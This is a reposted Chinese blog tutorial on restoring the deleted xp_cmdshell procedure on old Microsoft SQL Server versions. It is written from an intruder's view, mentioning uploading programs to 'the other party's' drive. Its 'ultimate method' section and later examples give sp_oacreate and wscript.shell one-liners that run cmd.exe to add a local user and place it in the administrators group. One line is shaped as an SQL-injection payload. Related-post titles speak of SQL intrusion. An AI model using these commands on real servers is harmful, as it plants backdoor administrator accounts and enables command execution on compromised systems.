删除和恢复xp_cmdshell的经典教程

最新推荐文章于 2018-07-10 12:12:25 发布
最新推荐文章于 2018-07-10 12:12:25 发布
阅读量700 收藏 1
点赞数
分类专栏: 脚本

常见情况恢复执行xp_cmdshell.

1 未能找到存储过程'master..xpcmdshell'.
     恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 
然后按F5键命令执行完毕

2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextendedproc "xp_cmdshell"
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕

3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'        
然后按F5键命令执行完毕

四.终极方法.
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'

xp或2003server系统:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'

例一:C:\>DIR C:\

未能找到存储过程 'master..xp_cmdshell'。

遇到这样的问题我们该如何解决?

解决办法一:

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'declare @o int

尝试:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

解决办法二:;

Exec master.dbo.sp_addextendedproc xp_cmdshell @dllname='xplog70.dll';--

解决方法三:

       查询分离器连接后,
     第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 
     第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 
     然后按F5键命令执行完毕


例二:C:\>DIR C:\

Cannot load the DLL xplog70.dll, or one of the DLLs it references. Reason: 126(找不到指定的模块。) 
   遇到这样的问题我们该如何解决?

解决办法:

   查询分离器连接后,
执行:sp_dropextendedproc "xp_cmdshell"
接着:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

以上2个问题还可用此解决办法:使用SQL查询分析器登陆,然后输入如下指令一般都可以解决 (未竟本人亲自测试,仅转载,raymin)

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c 这里可任意加你要输入的命令 如(net user adong198 8 /add '--)
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add


例三:C:\>DIR C:\ 
   无法装载 DLL xpsql70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。) 
   遇到这样的问题我们该如何解决?

解决办法

执行:sp_dropextendedproc "xp_cmdshell"

接着:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'


第四:无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
     恢复方法:查询分离器连接后,
     第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
     第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'        
     然后按F5键命令执行完毕

例五:明明将程序传到对方的C盘了,DIR C:\却找不到程序,为什么呢? 
   遇到这样的问题我们该如何解决?

解决办法:首先你确定复制过去了吗?确定那就运行一下,看看是否出现 [不是内部或外部命令,也不是可运行的程序] 等字样;如果你用的是SQLtool那个工具,我也遇见过,复制成功,但是找不到,可能那工具有问题,你用net share看看是否C盘是被共享的。还有就是被杀毒软件Kill了

kuxing100
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sql 注入
瞎几把学
06-06 449
xp_cmdshell这个模块给删除了需要上传xplog70.dll这个文件一、xp_cmdshell删除恢复1、判断xp_cmdshell是否存在and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)select count(*) from master.dbo
SQL入侵恢复xp_cmdshell方法总结
09-11
恢复xp_cmdshell SQL Server阻止了对组件 'xp_cmdshell' 的过程'sys.xp_cmdshell' 启用
SQL存储过程恢复删除收集
Yatere的天平秤
05-08 2075
<br /><br />Error Message:未能找到存储过程 'master..xp_cmdshell'。<br />修复法:很通用的,其实碰到 其他126 127的都可以一起修复,<br />除了xplog70.dll其他的都可以用这命令修复<br />xp_cmdshell新的恢复办法 <br />第一步先删除:<br />drop procedure sp_addextendedproc <br />drop procedure sp_oacreate <br />exec sp_dropex
sql server 2005 (2008)能成功删除系统存储过程以实现安全配置吗?
weixin_34337265的博客
06-24 177
看到有很多数据库安全配置的文章,在数据库安全配置方面提到了很重要的一条就是如何删除危险的系统存储过程,并且给出了很详细的实施脚本,让我们这些新手参照实施,但实际情况却不是这样的。比如我执行下面的语句: exec master..sp_dropextendedproc xp_cmdshell 会出现以下错误: 执行 exec master..sp_dropext...
'xp_cmdshell' does not exist??
iteye_15269的博客
08-31 242
  EXEC sp_configure 'show advanced options', 1;GORECONFIGURE;GOEXEC sp_configure 'xp_cmdshell',1 GO RECONFIGURE GO Refer http://msdn.microsoft.com/en-us/library/ms189631.aspx for more options. ...
去掉xpcmdshell增加系统安全性
伴老
06-30 2116
1.去掉xp_cmdshell扩展过程的方法是使用如下语句:以下是代码:if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)exec sp_dropextendedproc N'[dbo].[xp_cm
SQL Server如何启用xp_cmdshell组件1
08-08
在SQL Server中,`xp_cmdshell`是一个非常强大的系统存储过程,它允许数据库管理员执行操作系统级别的命令,并将结果返回到SQL Server环境中。然而,出于安全考虑,`xp_cmdshell`默认是禁用的,因为不恰当的使用可能...
SQL Server阻止了对组件xp_cmdshell过程的解决方案.docx
06-23
总的来说,理解和正确使用`xp_cmdshell`是SQL Server管理中的一个重要环节,尤其是在处理跨系统边界的任务时。但始终要牢记,安全永远是首要考虑的因素。在启用和使用`xp_cmdshell`时,务必谨慎行事。
xp_cmdshell开启与关闭
09-11
这将删除xp_cmdshell扩展存储过程,从而禁止xp_cmdshell的使用。 如果需要恢复xp_cmdshell,可以使用以下命令: ``` Use Master Exec sp_addextendedproc N'xp_cmdshell', N'xplog70.dll' Go ``` 这将恢复xp_cmd...
xplog70.dll
07-22
sql server xp_cmdshell模块,被删除后上传此文件恢复
SQL阻止组件xp_cmdshell过程解决方案
01-19
 SQLServer阻止了对组件'xp_cmdshell'的过程'sys.xp_cmdshell'的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用'xp_cmdshell'。有关启用'xp_cmdshell'的详细...
SQL Server 2012 xp_cmdshell不能执行的解决办法
学习是一种习惯
07-10 7759
        一个很早的系统,数据库一直跑的好好的,但在最近就无法执行压缩备份文件了,以至于1TB的硬盘很快就撑爆了。查了很久也没有找到原因,按照网上的很多方法都试了一遍,结果都不行。        这里要说一下啊,2008版本以后的sql server与之前版本的有很大的不同,就“外围应用“来讲,低版本中都是在操作系统的应用里可以看到的单独的应用,到了高版本后它变成了数据库实例的右键菜单里的一...
关于master..xp_cmdshell’的几个错误解决办法
热门推荐
雅冰石的专栏
01-22 1万+
错误一:Error Message:未能找到存储过程 ‘master..xp_cmdshell’。 第一步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc ‘xp_cmdshell’ 服务器: 消息 3701,级别 11,状态 5,行 1 第二步恢复
无法装载DLL Microsoft提示请误随意操作SQL数据库,以免对数据库造成不必要的麻烦或DLL所引用的某一DLL。原因:126(找不到指定模块)
tzj19810812的专栏
03-07 3779
之前曾经遇到过这个问题,但都是卸载后再重新安装解决的;今天查了半天资料,走运的把这个问题解决了;这种情况由于SQL2000的SA密码过于简单导致,被病毒恶意修改系统存储过程(master里面的扩展存储过程)在这次情况发生后,我查到master里面的扩展存储过程中有sp_OACreate,xp_dirtree,xp_regwrite这几个存储过程中的路径名都是乱码,于是把这几个存储过程过都删除drop procedure xp_ dropextendedproc........然后再执行这几个存储过程e
xp_cmdshell删除恢复
edwang133
07-31 1245
 扩展储存过程被删除以后可以有很简单的办法恢复删除drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc xp_cmdshell恢复dbcc addextendedproc ("sp_oacreate","odsole70.dll")dbcc addextendedproc (
1433恢复总结(mssql)
天才少年程序员-李荣盛专栏
11-15 424
恢复sp_addextendedproc语句: create procedure sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL contain
SQL恢复XP_CMDSHLL 以及XPLOG70.DLL被删 直接用SQL连接器开启3389
|独自望海。。。
09-13 8771
SQL恢复XP_CMDSHLL 以及XPLOG70.DLL被删 直接用SQL连接器开启3389用SQL连接器恢复XP_CMDSHLLE的命令 (1)SQL Query Analyzersp_addextendedproc xp_cmdshell,@dllname=xplog70.dll(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_ad
SQL Server 阻止了对组件“xp_cmdshell”的 过程“sys.xp_cmdshell”的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用“xp_cmdshell”。有关启用“xp_cmdshell”的详细信息,请搜索 SQL Server 联机丛书中的“xp_cmdshell”。
最新发布
06-06
这个错误提示是因为 SQL Server 阻止了对 `xp_cmdshell` 存储过程的访问,因为它被视为一个安全风险。如果你需要使用 `xp_cmdshell`,你需要先启用它。可以按照以下步骤启用 `xp_cmdshell`: 1. 使用管理员权限的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值